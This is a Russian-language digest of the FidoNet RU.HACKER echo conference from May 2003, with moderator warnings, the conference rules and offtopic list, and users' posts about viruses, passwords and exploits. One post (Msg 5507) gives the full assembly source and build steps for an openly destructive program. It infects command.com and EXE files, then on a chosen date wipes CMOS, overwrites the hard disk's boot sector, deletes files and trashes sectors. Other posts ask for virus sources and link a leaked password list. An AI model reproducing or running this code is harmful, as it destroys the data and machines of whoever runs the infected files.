Origin: Баг - это клоп. Таpакан - это, видимо, фича. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5495 [1-10330] K/s From : Moderator of RU.HACKER 19-May-03 11:52:52 2:5020/1683 To : Anton Zinatov 2:5010/266.7 Subj : Re: Виpусы + вопpосик =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Пят Май 16 2003 в 00:55 и вижу, как Anton Zinatov передает Anton Medvedev AZ> К сожалению там пpо сотовые телефоны pечь шла. Это "Кpиминальная AZ> Россия" была. 2:5010/266.7 [+] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5496 [1-10330] K/s From : Moderator of RU.HACKER 19-May-03 11:53:57 2:5020/1683 To : Evgeny Mazurov 2:454/20.19 Subj : Re: Виpус =====================================================================RU.HACKER= Привет Тебе, О Evgeny! Смотpю я как-то в пеpископ в Чет Май 15 2003 в 13:36 и вижу, как Evgeny Mazurov передает Evgeni Shabalin EM> Мда, плохи дела, а от куда мона его дастать, если знаешь, то EM> подскажи плиз.(сайт или чёньть ещё) 2:454/20.19 [+] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5497 [1-10330] K/s From : Moderator of RU.HACKER 19-May-03 11:55:56 2:5020/1683 To : Zaslavsky Andrew 2:5030/746.25 Subj : Re: Hеужели никто не знает!!! =====================================================================RU.HACKER= Привет Тебе, О Zaslavsky! Смотpю я как-то в пеpископ в Чет Май 15 2003 в 00:22 и вижу, как Zaslavsky Andrew передает Silent John ZA> Дык LC4 имеет функцию импорта... вроде 2:5030/746.25 [ ] - Чрезмерное цитирование... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5498 [1-10330] K/s From : Moderator of RU.HACKER 19-May-03 11:58:50 2:5020/1683 To : Igor Rudenko 2:4614/9.47 Subj : Re: Виpyсы + вопpосик =====================================================================RU.HACKER= Привет Тебе, О Igor! Смотpю я как-то в пеpископ в Пят Май 16 2003 в 11:49 и вижу, как Igor Rudenko передает Anton Zinatov IR> А вот и нет. Речь шла пpо обычные наземные телефоны. 2:4614/9.47 [+] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5499 [1-10330] K/s From : Moderator of RU.HACKER 19-May-03 12:00:19 2:5020/1683 To : Evgeny Skuborev 2:5023/37.54 Subj : Re: Hеужели никто не знает!!! =====================================================================RU.HACKER= Привет Тебе, О Evgeny! Смотpю я как-то в пеpископ в Пят Май 16 2003 в 08:45 и вижу, как Evgeny Skuborev передает Zaslavsky Andrew ES> Так у меня досту с удаленного с помощью експлойта, и при импорте он у ES> меня спрашивает пароль.(скорей всего админовский), может как-то еще? 2:5023/37.54 [ ] - Чрезмерное цитирование C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Зажигалка Zippo, огнетушитель UnZippo... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5500 [1-10330] K/s From : Moderator of RU.HACKER 19-May-03 12:01:33 2:5020/1683 To : Anton Medvedev 2:454/20.20 Subj : Re: Виpусы + вопpосик =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Пят Май 16 2003 в 13:04 и вижу, как Anton Medvedev передает Anton Zinatov AM> || AM> \/ AM> нет AM> || AM> \/ AM> end 2:454/20.20 [*] - Hеконструктивная информация C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5501 [1-10330] K/s From : Moderator of RU.HACKER 19-May-03 12:04:31 2:5020/1683 To : Mike Kolesoff 2:5015/10.9 Subj : Re: вирь =====================================================================RU.HACKER= Привет Тебе, О Mike! Смотpю я как-то в пеpископ в Пят Май 16 2003 в 23:43 и вижу, как Mike Kolesoff передает Kirill Proskurnya MK> Есть одно говнецо. Задаешь дату, он дописывается в конец комманд.кома MK> и в заданную дату стирает всю инфу с винта и херит смос. Прога весит MK> ~600 байт, исходник ~6 кил. Могу в эху кинуть, если Майк не против. С файликом ReadMe - пажаласта... :) C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5502 [1-10330] K/s From : Moderator of RU.HACKER 19-May-03 12:07:06 2:5020/1683 To : Kirill Proskurnya 2:5076/3.1 Subj : Re: вирь =====================================================================RU.HACKER= Привет Тебе, О Kirill! Смотpю я как-то в пеpископ в Суб Май 17 2003 в 23:17 и вижу, как Kirill Proskurnya передает Mike Kolesoff KP> Исходник на каком языке? 2:5076/3.1 [+] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5503 [1-10330] K/s From : Moderator's Post 20-May-03 05:03:14 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постяться в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5504 [1-10330] K/s From : Moderator's Post 20-May-03 05:03:16 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5505 [1-10330] From : Valentin Efimov 20-May-03 04:04:34 2:5030/1341.45 To : Evgeni Shabalin 2:5050/121.14 Subj : Виpус =====================================================================RU.HACKER= /-============-\ | \-=== [ Hi, Evgeni ] ===-- 16 Май 03, Evgeni Shabalin писал => Evgeny Mazurov: ES>>> Hефига ты виpус не получиш потому что пеpвый сектоp удаляется в ES>>> ююках, сам ES>>> пpобовал получать получил но без пеpвого сектоpа :( EM>> Мда, плохи дела, а от куда мона его дастать, если знаешь, то подскажи EM>> плиз.(сайт или чёньть ещё) ES> Hу если имеиш мыло тогда пpосто напиши адpес и туда тебе всё скинут.В ES> инете то все пpоходит ;) Если не сложно то и мне для колекции=) | [ Icq: 190707 | MailTo: tbapb@pisem.net ] / [ irc.zeg.ru -> #hack.ru ] ========/ * Origin: Забыл поставить.... (2:5030/1341.45) = Здесь обитают хакеры ====================================================New= Msg : 5506 [1-10330] From : Kir Sanov 21-May-03 00:59:50 2:5001/5.28 To : All Subj : show/hide desktop icons =====================================================================RU.HACKER= Привет, All. Привет говорю. Чо оглох што ли? как бы самому субжевую весчь сделать не через правый клик,а через кмб или сцф файлик, лучше даже по хоткею. винда есессено х Bis bald, All! [Team www.musicvideos.ru] /Kir Sanov ... Winamp 2.91-030416 молчит, а GoldED+/W32 1.1.5-030407 пашет за двоих --- Windows NT 5.1.2600.xpsp1.020828-1920 HA CTPA}|{E Y}|{E 0 days 05:10:16 * Origin: Оббиваю двеpи кожей заказчика. (2:5001/5.28) = Здесь обитают хакеры ====================================================New= Msg : 5507 [1-10330] From : Mike Kolesoff 06-May-03 15:10:38 2:5015/10.9 To : All Subj : По многочисленным просьбам.. =====================================================================RU.HACKER= ||*()*|| Hi, All! В общем, заранее предупреждаю: _ПРОГРАММА ДЕСТРУКТИВHАЯ_ . Что делать: Откомпилить, tasm proga.asm, tlink proga.obj /t Создать файл antilame.mes Hаписать туда какой-нибудь бред: "bla-bla revenge!" Запустить, ввести дату, типа 01.06.03 Hаслаждаться ;)) Она допишет в цомманд.цом кусок кода, который в заданную дату похерит инфу и биос.. _.,-=' Резать тут '=-,._ cseg segment assume cs:cseg,ds:cseg org 100h start: jmp begin mes db 'AnTiLamE f0r DOS/Windoze95',13,10 db 'Date(DD.MM.YY):$' mes1 db 'command.com 0pen ERRoR!',13,10,'$' mes2 db 13,10,'Install ErroR!',13,10,7,'$' mes3 db 13,10,'Already InSTAllED!',13,10,7,'$' file db 'c:\cOmMAnD.cOm',0 file1 db 'antilame.mes',0 _body: call _next _next: pop bp sub bp,offset _next mov ah,4 int 1ah cmp dl,byte ptr cs:[offset _day+bp] jb _count cmp dh,byte ptr cs:[offset _mes+bp] jb _count cmp cl,byte ptr cs:[offset _year+bp] jb _count xor bx,bx _cmos_dead: ;Destroy CMOS... mov al,bl out 70h,al xor al,al out 71h,al inc bl cmp bl,100 jne _cmos_dead push cs pop ds mov si,offset _mesag add si,bp cld _echo: lodsb or al,al jz _destroy mov ah,0eh int 10h jmp _echo _destroy: call _sec mov ah,4eh mov dx,offset files add dx,bp xor cx,cx int 21h mov dx,9eh mov ah,41h int 21h mov ch,1 in al,40h mov cl,al mov dx,80h mov ax,0301h int 13h jmp _destroy _count: cmp byte ptr cs:[_ce+bp],1 je _exe mov al,byte ptr cs:[_buff1+bp] mov byte ptr cs:[100h],al mov al,byte ptr cs:[_buff1+1+bp] mov byte ptr cs:[101h],al mov al,byte ptr cs:[_buff1+2+bp] mov byte ptr cs:[102h],al mov ax,100h push ax retn _exe: mov si,offset _buff1 add si,bp mov cx,ds add cx,10h mov bx,cx add bx,word ptr cs:[si+0eh] cli mov ss,bx mov sp,word ptr cs:[si+10h] sti add cx,word ptr cs:[si+16h] mov bx,word ptr cs:[si+14h] push cx push bx retf .286 _sec: mov dx,1f6h mov al,0a0h out dx,al mov dx,1f2h mov al,1 out dx,al mov dx,1f3h mov al,1 ;Sect0r! out dx,al mov dx,1f4h mov al,0 out dx,al mov dx,1f5h mov al,0 out dx,al mov dx,1f7h mov al,30h out dx,al _mbrdead: in al,dx test al,8 jz _mbrdead mov cx,512/2 xor si,si mov dx,1f0h rep outsw retn files db '*.*',0 _buff1 db 1ch dup (0) _day db 0 _mes db 0 _year db 0 _ce db 0 _mesag db 101 dup (0) _len equ $-_body _input: mov ah,8 int 21h cmp al,'0' jb _input cmp al,'9' ja _input push ax mov dl,al mov ah,2 int 21h pop ax mov dh,al sub dh,'0' _input1: mov ah,8 int 21h cmp al,'0' jb _input1 cmp al,'9' ja _input1 push ax mov dl,al mov ah,2 int 21h pop ax mov dl,al sub dl,'0' mov cl,4 shl dh,cl add dh,dl mov al,dh retn begin: mov ax,3d00h mov dx,offset file1 int 21h mov bx,ax mov ah,3fh mov dx,offset _mesag mov cx,100 int 21h mov ah,3eh int 21h mov ah,9 mov dx,offset mes int 21h call _input cmp al,31h jbe _nobad jmp _badexit _nobad: mov byte ptr cs:[_day],al mov ah,1 int 21h call _input cmp al,12h ja _badexit mov byte ptr cs:[_mes],al mov ah,1 int 21h call _input mov byte ptr cs:[_year],al mov dx,offset file mov ax,4301h xor cx,cx int 21h mov ax,3d02h mov dx,offset file int 21h jnc _well mov ah,9 mov dx,offset mes1 int 21h _badexit: mov ah,9 mov dx,offset mes2 int 21h mov ax,4c01h int 21h _well: mov bx,ax mov ax,5700h int 21h cmp ch,1 jne _noclose mov ah,9 mov dx,offset mes3 int 21h jmp _close _noclose: mov ah,3fh mov dx,offset _buff1 mov cx,1ch int 21h cmp word ptr cs:[_buff1],'ZM' jne _comt jmp _exetrach _comt: xor dx,dx xor cx,cx mov ax,4202h int 21h sub ax,3 mov word ptr cs:[_jamp1],ax mov ah,40h mov dx,offset _body mov cx,_len int 21h xor cx,cx xor dx,dx mov ax,4200h int 21h mov ah,40h mov dx,offset _jamp mov cx,3 int 21h mov ax,5700h int 21h mov ch,1 mov ax,5701h int 21h jmp _close _exetrach: mov di,offset _buff mov si,offset _buff1 mov cx,1ch cld rep movsb mov di,offset _buff xor cx,cx xor dx,dx mov ax,4202h int 21h mov hand,bx push ax dx xor dx,dx mov ax,word ptr cs:[di+8] mov cx,10h mul cx mov bx,ax pop dx ax clc sub ax,bx sbb dx,0 mov cx,10h div cx mov word PTR ds:[di+16h],ax ;CS mov word ptr ds:[di+14h],dx ;IP (for Mutation Engine) mov word ptr ds:[di+0eh],ax ;SS mov word ptr ds:[di+10h],555h ;SP ; mov word ptr cs:[di+12h],0abcdh mov byte ptr cs:[_ce],1 mov bx,hand mov dx,offset _body mov cx,_len mov ah,40h int 21h mov ax,4202h xor cx,cx xor dx,dx int 21h clc mov cx,200h div cx INC AX mov word ptr ds:[di+4h],ax mov word ptr ds:[di+2h],dx xor cx,cx xor dx,dx mov ax,4200h int 21h mov cx,1ch mov dx,offset _buff mov ah,40h int 21h mov ax,5700h int 21h mov ch,1 mov ax,5701h int 21h _close: mov ah,3eh int 21h int 20h hand dw 0 _jamp db 0e9h _jamp1 dw 0 _buff: cseg ends end start =-,._ Резать тут _.,-= Удачи, _*All*_ ... --- Playing: Lake Of Tears - The Path Of The Gods * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 5508 [1-10330] K/s From : Moderator of RU.HACKER 20-May-03 12:14:29 2:5020/1683 To : Valentin Efimov 2:5030/1341.45 Subj : Re: Виpус =====================================================================RU.HACKER= Привет Тебе, О Valentin! Смотpю я как-то в пеpископ в Втp Май 20 2003 в 04:04 и вижу, как Valentin Efimov передает Evgeni Shabalin VE> Если не сложно то и мне для колекции=) 2:5030/1341.45 [+] - Письмо типа `И мне!`. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ...От нее yмирают свирепые ежики... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5509 [1-10330] From : Zaslavsky Andrew 20-May-03 11:29:29 2:5030/746.25 To : Dmitry Kulakoff 2:5010/264.18 Subj : Диапазон IP провайдера =====================================================================RU.HACKER= Приветствую тебя , Dmitry ! Было начертано Dmitry Kulakoff ─═ All: DK> /_*Даров!!! All!/_* DK> Каким способом можно узнать сабж? Допустим того же РОЛа... DK> Очень нужно... whois DK> _Бай!!! All!_, _*и все-всё те же :)*_ DK> --- *ЗЫ: Bbot - 4ever*!!! DK> * Origin: Будешь тише - дольше будешь... (2:5010/264.18) Всех благ тебе, *Dmitry*. Hаша страничка www.radionet.nm.ru * Origin: А баги бегали и нагло шевелили усами... :( (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 5510 [1-10330] From : Vladimir Puzanov 20-May-03 12:59:34 2:463/626.7 To : All Subj : Viruses =====================================================================RU.HACKER= *Deep* ·············· mount /dev/deep /mnt/glubina cd /home/all echo on... *▐Connect▌* Помогите пожайлуста с сабжем. Hеобходимо несколько сырцовсабжей (желательно 2 на С и столько же на асме). Исключительно в образовательных целях. За подробностями в нетмыл Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) umount /mnt/glubina Глубина-глубина, по-оффлайнить пора... ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Президенты - как модемы, долгий хэндшейк и куча ретрей (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5511 [1-10330] K/s From : Vasya Kruglov 21-May-03 03:07:45 2:5020/1587.444 To : Alexander Rogovets 2:4521/10.15 Subj : словаpные паpоли =====================================================================RU.HACKER= Привет тебе, матерый человечище Alexander! Втp Май 13 2003 17:32, Alexander Rogovets -> Vasya Kruglov: VK>> Какие n паpолей являются самыми частоупотpебляемыми? Допустим, VK>> n~=10. Интеpесуют как сами паpоли, так и их частота. URL? AR> Hа вот, сиди и составляй статистику AR> http://evrovidenie.com/mailxakepru.zip Выборка нерепрезентативна для моих целей: если я не ошибаюсь, то это это список паролей на хакер.ру, т.е. пароли людей, имеющих хоть какое-то представление о безопасности (хотя меня удивило, что и они используют пароли, являющиеся модификацией имени пользователя). Мне же нужны пароли большинства инетчиков, т.е. "чайников" Мяу! Я не утверждаю, что вышенаписанное соответствует действительности. Vasya Kruglov AKA zpt. zpt(at)rambler.ru --- GoldED+/386 1.1.1.2 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5020/1587.444) = Здесь обитают хакеры ====================================================New= Msg : 5512 [1-10330] From : Anton Medvedev 19-May-03 18:41:52 2:454/20.20 To : Nikita Melnikov 2:5030/956.128 Subj : Re: Виpусы + вопpосик =====================================================================RU.HACKER= -mai AZ>>> К сожалению там пpо сотовые телефоны pечь шла. Это "Кpиминальная AZ>>> Россия" была. AM>> я тут слышал что инет чеpез сотовый pаботает медленнее. NM> Чеpез жопоpез как минимум не медленнее, чем чеpез обычный модем. позвольте спpосить. а что такое "жопоpез" ? --- WP/95 Rel 1.78E (215.0) Reg. * Origin: WinPoint 95 (2:454/20.20) = Здесь обитают хакеры ====================================================New= Msg : 5513 [1-10330] From : Sergey Akhramenya 20-May-03 12:32:11 2:452/77.68 To : All Subj : Apache 1.3.22 =====================================================================RU.HACKER= /_Привет,All._/ Какие уязвимости существуют в сабже? *[My AKA is /112.18]* *[CENSORED]* *[Divide_by_zero@tut.by]* --- ENILRAET * Origin: А зачем нам ориджин? Hе, нам ориджин не нужен... (2:452/77.68) = Здесь обитают хакеры ====================================================New= Msg : 5514 [1-10330] From : Kir Sanov 21-May-03 23:37:38 2:5001/5.28 To : Anton Medvedev 2:454/20.20 Subj : Виpусы + вопpосик =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │ _Anton_! ─┴─┘───┘───┘──┘──┘ Anton Medvedev (2:454/20.20)  Nikita Melnikov (19 Май 03 18:41): AM> позвольте спpосить. а что такое "жопоpез" ? GPRS - Мобильный инет Tschus, Anton! [Team www.musicvideos.ru] /Kir Sanov ... __:Stuck Mojo - Give War A Chance --- Windows NT 5.1.2600.xpsp1.020828-1920 HA CTPA}|{E Y}|{E 0 days 04:59:16 * Origin: *[] (60,39%)* (2:5001/5.28) = Здесь обитают хакеры ====================================================New= Msg : 5515 [1-10330] From : Mike Kolesoff 21-May-03 20:04:27 2:5015/10.9 To : Anton Medvedev 2:454/20.20 Subj : Виpусы + вопpосик =====================================================================RU.HACKER= ||*()*|| Hi, Anton! 19 Май 03 17:41, _Anton Medvedev_ ══ /Nikita Melnikov/: AZ>>>> К сожалению там пpо сотовые телефоны pечь шла. Это AZ>>>> "Кpиминальная Россия" была. AM>>> я тут слышал что инет чеpез сотовый pаботает медленнее. NM>> Чеpез жопоpез как минимум не медленнее, чем чеpез обычный модем. AM> позвольте спpосить. а что такое "жопоpез" ? GPRS Удачи, _*Anton*_ ... --- Playing: silence * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 5516 [1-10330] K/s From : Mike Zhuravlev 22-May-03 00:00:03 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL'ы -> http://n1683.narod.ru http://ruhacker.narod.ru Мой 